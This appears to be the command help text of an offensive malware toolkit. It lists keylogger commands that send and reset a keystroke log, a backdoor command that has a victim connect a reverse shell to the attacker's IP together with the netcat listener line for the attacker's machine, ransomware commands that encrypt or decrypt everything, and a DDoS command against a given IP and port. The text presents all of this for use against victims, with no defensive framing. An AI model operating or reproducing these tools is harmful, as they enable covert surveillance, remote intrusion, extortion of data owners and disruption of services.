###########################################################################################################################
####################################################     KEYLOGGER     ####################################################
###########################################################################################################################

[+] keylogger send_log: Sends the log and resets it
[+] keylogger reset_log: Erases all the content of the log file

###########################################################################################################################
####################################################     BACKDOOR     #####################################################
###########################################################################################################################

[+] backdoor <hacker_ip> <netcat port>: Tell the victim where to connect the reverse shell
    [*] Open the backdoor (listener) on attacker's machine: nc -lvnp <port>

###########################################################################################################################
###################################################     RANSOMWARE     ####################################################
###########################################################################################################################

[+] ransomware encrypt: Let the ransomware encrypt everything
[+] ransomware decrypt: Let the ransomware decrypt everything

###########################################################################################################################
######################################################     DDOS     #######################################################
###########################################################################################################################

[+] ddos <ip> <port>
    [*] Start the server on the attacker's machine (localhost:80): sudo systemctl start nginx.service